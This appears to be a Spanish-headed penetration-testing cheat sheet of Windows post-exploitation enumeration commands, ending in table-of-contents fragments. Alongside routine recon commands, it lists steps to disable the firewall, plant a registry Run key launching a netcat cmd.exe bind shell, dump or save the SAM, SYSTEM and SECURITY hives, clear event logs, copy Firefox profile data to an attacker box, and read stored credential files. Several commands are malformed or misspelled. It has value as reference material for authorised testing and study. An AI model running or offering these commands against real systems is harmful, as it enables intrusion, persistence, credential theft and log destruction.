Windows Enum
Enumeración Básica
Comandos manuales
#info
hostname
systeminfo
#Hot Fix installations
wmic qfe get Caption,Description,HotFixID,InstalledOn
#Eula
type c:\\Windows\\System32\eula.txt
#Query state of Firewall, Disable Firewall, Allow a Service Through
#Query state of firewall:
netsh firewall show state
#Disable firewall
netsh.exe firewall set opmode mode=disable profile=all
#Allow service through firewall
netsh.exe firewall set portopening tcp 123 MYSERVICE enable all
netsh.exe firewall set allowedprogram C:\MYPROGRAM.exe
HKLM\software\microsoft\windows\ currentversion\run –d ‘C:\windows\system32\nc.exe -Ldp 4444 -e cmd.exe’ –v netcat
netsh firewall set allowedprogram c:\nc.exe allow_nc ENABLE
#Query current user and privilege information
whoami
whoami /all
whoami /user
whoami /groups
whoami /priv
[Users]
net users: list users
For more info on a user:
net user (for local user)
net user /domain (for a domain user)
#View domain admins:
net group "Domain Admins" /domain
#View name of domain controller:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History" /v DC
Add user:
net users /add
#Add user to local administrators group:
net localgroup administrators /add
#Delete a user:
net users username /delete /domain
#Change user's password:
net users
[Accounts & Groups]
net accounts
net accounts /domain
net logalgroup administrators
net localgroup administrators /dmain
net group "domain Admins" /domain
net group "Enterprise Admins" /domain
net view /localgroup
net localgroup Administrators
net localgroup /Domain
gpresult: view group policy
gupdate: update group policy
gpresult /z
[Network and misc information]
systeminfo: lists information about system
ipconfig/all: Query ip configuation
ipconfig /displaydns
# Prints machines routing table
route print
# Lists all systems current in the machine's ARP table
arp -a
# Query server information
nslookup
# Displays protocol stats and current TCP/IP connections using NetBIOS over TCP/IP
nbtstat
# Query info about RDP sessions
qwinsta
# Query session information
net session
net time \computername # (Shows the time of target computer)
# view shared resources on network
net share
#[Query current drives on system]
fsutil fsinfo drives
#[Grab SAM and SYSTEM files]
type "C:/windows/repair/SAM"
type "C:/windows/repair/SYSTEM"
#[Tasks]
tasklist /svc: lists running processes
taskkill /PID /F : forcibly kill task
taskkill taskkill /PID xxx taskkill /IM name of process to be terminated can be used to kill all processes with same name
tasklist /V /S computername: Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount
qprocess*: Similar to tasklist but easier to read
at: Query current scheduled tasks
schtasks: Query scheduled tasks that your current user has access to see.
schtasks /query /fo csv /v > %TEMP%
[Netstat]
netstat -ano : to see what services are running on what ports
netstat -bano
netstat -r
netstat -na | findstr :443
[Query information about server and workstation, Workstation domain name and Logon domain]
net config server
net config workstation
[Change drive to different drive letter]
ex change to D:/ directory and list it's contents:
d: & dir
cd /d d: & dir
dir \computername\share_or_admin_share (dir list a remote directory)
[Cat contents of file located in D:/ directory]
cd /d & type d:\blah\blah
[net view]
net view /domain[:DomainName]
net view \computerName
[Services]
View list processes started upon startup
net start
wmic startup get caption,command
[Query, Stop/Start/Pause Installed Services]
sc query state= all
sc query
sc
[Remote System Access]
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net share \computername
tasklist /V /S computername
qwinsta /SERVER:computername
qprocess /SERVER:computername
*[WMI]
wmic bios
wmic qfe
wmic qfe get hotfixid (This gets patches IDs)
wmic startup
wmic service
wmic os
wmic process get caption,executablepath,commandline
wmic process call create “process_name” (executes a program)
wmic process where name=”process_name” call terminate (terminates program)
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
wmic useraccount (usernames, sid, and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (you can use ? for gets help ! )
wmic startup list full (this can be a huge list!!!)
wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)
[Reg Command]
reg save HKLM\Security security.hive (Save security hive to a file)
reg save HKLM\System system.hive (Save system hive to a file)
reg save HKLM\SAM sam.hive (Save sam to a file)=
reg add [\TargetIPaddr] [RegDomain][ \Key ]
reg export [RegDomain][Key] [FileName]
reg import [FileName ]
reg query [\TargetIPaddr] [RegDomain][ Key ] /v [Valuename!] (you can to add /s for recurse all values )
[Deleting Logs]
wevtutil el (list logs)
wevtutil cl
[Uninstalling Software]
wmic proud get name /value: gets software names
wmic product where name="XXX": call uninstall /Interactive:Off: unintalss software
[Permissions]
icacls
Grant full access over directory and encompassing folders and files:
icacls "C:\windows" /grant Administrator:F /T
icacls "C:\" /grant "nt authority\system": F /T
[Net use]
net use: Map network shares
net use \computername (maps IPC$ which does not show up as a drive)
net use \computername /user:DOMAINNAME\username password ○ (maps IPC$ under another username)
[Mount a remote share with the rights of the current user]:
net use K: \\
dir K:
[Enable remote desktop]
reg add "HKLM\System\CurrentControlSet\Control\TermServer" /v fDenyTSConnections /t REG_DWORD /f
net session: list session information
[Other useful Commands]
pkgmgr usefull /iu :"Package"
pkgmgr usefull /iu :"TellnetServer": install telnet service
pkgmgr /iu:"TelnetClient"
rundll32.exe user32.dll, LockWorkStation: locks the screen
wscript.exe <script js/vbs>
cscript.exe <script js/vbs/c#>
xcopy /C /S %appdata%\Mozilla\Firefox\Profiles*.sqlite \your_box
type "C:\documents and settings\administrator\userdata\index.dat"
type %WINDIR%\System32\drivers\etc\hosts: view contents of hosts files
type "c:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials"
cd "C:/Documents and settings\administrator\userdata" & dir
type "c:\Documents and Settings\Administrator\Desktop\UserMysql.txt"
type "c:\Documents and Settings\Administrator\Application Data\MySQL\mysqlx_user_connections.xml"
type "C:\documents and settings\administrator\userdata\index.dat"Meterpreter
Enumeración de Usuarios
Comandos manuales
Meterpreter
Enumeración de Red
Comandos manuales
Enumeración de procesos
Comandos
Automatizar enumeración
JWAS
winPEAS
Metasploit
Ataques en ADBibliografia
Última actualización